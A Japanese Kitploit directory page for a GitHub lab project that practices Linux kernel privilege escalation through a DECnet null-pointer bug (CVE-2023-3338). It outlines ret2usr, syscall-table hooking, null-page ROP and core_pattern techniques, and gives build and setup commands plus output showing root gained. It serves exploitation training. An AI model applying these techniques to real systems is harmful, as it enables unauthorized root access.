Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-3338-DECPwn — NPD脆弱性を用いたLinuxカーネルLPEの演習 | Kitploit
ツール/GitHubGitHub/turtlearm/cve-2023-3338-decpwn
特権昇格エクスプロイト学習と教育バイナリエクスプロイトラボと実践
GitHubturtlearm/cve-2023-3338-decpwn

CVE-2023-3338-DECPwn

NPD脆弱性を用いたLinuxカーネルLPEの演習

リポジトリを見る
35733年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

DECPwn

自身のDECnet脆弱性とヌルページマッピングを有効にした状態で、さまざまなLinuxカーネルエクスプロイト技術を練習します。


シナリオ

  • すべて無効: qemu-system-x86_64 -append "nosmap nosmep nopti nokaslr"

    コード実行はユーザーランドのoutput関数にリダイレクトされ、commit_creds(prepare_kernel_cred(0))を呼び出します。

  • システムコールフッキング

    sys_call_table内のmkdirシステムコールハンドラアドレスを、シナリオ1のものと類似した関数と置き換えます。

  • SMEPとKPTI有効: qemu-system-x86_64 -append "nosmap nokaslr"

    コード実行はスタックピボットにリダイレクトされ、ヌルページ内のROPチェーンに_$rsp_を設定します。

  • ユーザーモードヘルパー

    core_pattern sysctlが上書きされ、コアダンプ時に昇格した特権で実行するコマンドが指定されます。

    その後、プログラムはSIGABRTシグナルで中断され、ユーザーモードスクリプトがトリガーされます。

ビルド

root@kitploit:~
apt install libdnet
gcc -o lpe lpe.c -ldnet
gcc -o lpe-core_pattern lpe-core_pattern.c -ldnet
gcc -o lpe-nosmep lpe-nosmep.c -ldnet -no-pie
gcc -o lpe-syscall lpe-syscall.c -ldnet -no-pie

実行

rootとしてDECnetを構成します:

root@kitploit:~
sysctl -w vm.mmap_min_addr="0" # 0x1000
echo -n "1.10" > /proc/sys/net/decnet/node_address

非特権ユーザーとしてエクスプロイトを実行します:

root@kitploit:~
$ ./lpe
[*] Saved state
[*] Triggering NPD
[*] Returned to userland
[*] UID: 0, got root!
#
ツールをダウンロード